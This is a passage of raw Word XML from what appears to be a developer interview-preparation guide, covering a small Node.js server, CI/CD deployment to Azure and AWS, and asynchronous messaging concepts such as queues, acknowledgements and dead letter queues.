          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C28DEE"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createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CBAF4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write('Hello from Node.js!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01107CD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end();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091ADC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3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4803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un it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50768F2C"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de server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043766A" w14:textId="31B791D0"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3865" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BCFAC" w14:textId="2A2D181C" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00107FFD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="955" w:name="_Toc197868169"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is your application getting deployed? Which platform are you using in your project</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="955"/>
    </w:p>
    <w:p w14:paraId="33963A03" w14:textId="336DD811" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4"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our project, the application is deployed using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> set up in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub Action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Azure DevOps/Jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the project). Here's a breakdown of how deployment typically works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C5989"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4213BC">
          <v:rect id="_x0000_i3866" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1743AB72"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Deployment Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15039E"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Commit</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velopers push code to a GitHub repository (main or feature branches).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333877A7"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Pipeline Trigger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On push, the CI pipeline runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852FE70"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de build (Maven/Gradle for Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7CE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9A25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ting and static code analysis (SonarQube, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6C67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tifact Cre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The build generates artifacts (JAR/WAR or Docker images).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8A6A9"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Push (for Dockerized app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 xml:space="preserve">Docker images are pushed to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Azure Container Registry (AC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DockerHub</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE7CA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 Pipeline</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ploys the artifacts to the target environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69613303"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zure App Service / Azure Kubernetes Service (AKS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Azure deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EEEF3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ECS/EKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for AWS deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B740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m charts or kubectl are used if it's AKS or EKS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448038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Environment Configur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Environment variables, secrets, and configurations are injected via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06155922"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Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09302F"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 ConfigMaps/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A7C2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environment settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAA2FC"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BF6E1">
          <v:rect id="_x0000_i3867" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB992F"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Platforms in Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31904850"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ud</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Azure (App Services, AKS), or AWS (ECS/EKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0732ED4C"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GitHub Actions, Azure DevOps, Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C633FB"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ainerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C506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chestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A712A3" w14:textId="362EBF97"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3868" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C5277" w14:textId="25C165B3" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00872F98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="956" w:name="_Toc197868170"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What do you know about Asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="956"/>
    </w:p>
    <w:p w14:paraId="16037DD9" w14:textId="223D6455" w:rsidR="001D328D" w:rsidRPr="00617E2C" w:rsidRDefault="001D328D"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refers to a non-blocking way of exchanging data between two or more systems/components, where the sender and receiver </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>do not need to interact at the same time</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFFA97B"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1CAED">
          <v:rect id="_x0000_i3869" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51158E47"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ncepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43001548"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nder sends a message and continues its work</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without waiting for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D3CAD"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ceiver processes the message independently</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, possibly at a later time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494DAAAA"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22C0D5">
          <v:rect id="_x0000_i3870" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399124D"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FE5F1"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ing systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140543D1"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ache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290766AB"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abbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA7B60"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Service Bus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BCFC3"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WS SQS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E6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mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – You send an email, and the receiver replies later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7716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ebhooks</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – One service notifies another asynchronously when an event occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6D269"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4CAA4E">
          <v:rect id="_x0000_i3871" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A82FD5C"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93"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="318DB4E6" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E3E6599"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hronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACC7ABF"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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="76B0274E" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2461A84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locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5181ABFF"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n-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3EC832C1" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE0DB16"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 response required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7341CFA7"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ponse may come later</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6AC7D1B1" w14:textId="77777777" w:rsidTr="001D328D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214FDDF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 API (typically)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1003545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afka, RabbitMQ, WebSockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC45AB5"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E6727">
          <v:rect id="_x0000_i3872" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD87858"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nefits of Async Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D905A"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etter </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E79202"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oupled architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD90AE0"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andles </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74831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roves </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A6653" w14:textId="0CC8D8D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3873" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD85301" w14:textId="3EA61C11" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="001B732B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="957" w:name="_Toc197868171"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the measure objects i.e key things in order to make Asynchronous calls</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="957"/>
    </w:p>
    <w:p w14:paraId="7A39335E" w14:textId="75F7C400"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implement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there are several </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key components (measure objects)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are essential to ensure smooth, reliable, and scalable messaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74909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0B8CAD">
          <v:rect id="_x0000_i3874" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCAD6E"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mponents for Asynchronous Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6191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Queue or Event Bus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CA5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ts as a buffer between sender and receiver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBB08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Kafka, RabbitMQ, AWS SQS, Azure Service Bus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431072C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decoupling and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69110633"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Producer / Publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27C9AA"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s the message to the queue/topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70514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n’t wait for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA03E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Responsible for serialization of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A588B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Consumer / Subscriber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7ACAB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s or pulls messages from the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFC07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cesses them independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246B9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n scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53700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Message Format / Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE767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only JSON, Avro, or Protobuf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A149C7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both sender and receiver understand the structure of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C328D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Message Acknowledgement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103A9DC"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successful processing of the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498354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reliability (e.g., Kafka offset commits or RabbitMQ ACKs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E402B1A"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Retry Mechanism &amp; Dead Letter Queue (DLQ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC23D2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ndles failures in processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB1615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tries message n times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF0A58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still fails, moves message to DLQ for further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AA16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Correlation ID / Trace ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DECE3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a message across microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329955F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ful for debugging and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82C91B"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Backpressure &amp; Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769E06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consumer overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1E5B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rols flow of messages (important in high-traffic systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665A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Concurrency &amp; Threading (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B950F"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 processing might involve multi-threaded consumer services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E268A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Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D64A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ols like Prometheus + Grafana, ELK stack, Zipkin, or Jaeger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FABD0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message flow and identifying bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32F05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207C1A">
          <v:rect id="_x0000_i3875" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B0CE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onus: Async in Web/Mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BB95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ontend: async/await, Promises, AJAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1FE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ackend: Non-blocking frameworks like </w:t>
      </w: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pring WebFlux</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Vert.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AE7F9" w14:textId="4C583E7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3876" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512CEDC" w14:textId="60E74BF7" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="007B5F7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="958" w:name="_Toc197868172"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have two different technologies then how can we achieve asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="958"/>
    </w:p>
    <w:p w14:paraId="69247D2E" w14:textId="76E56CC3" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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 have </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
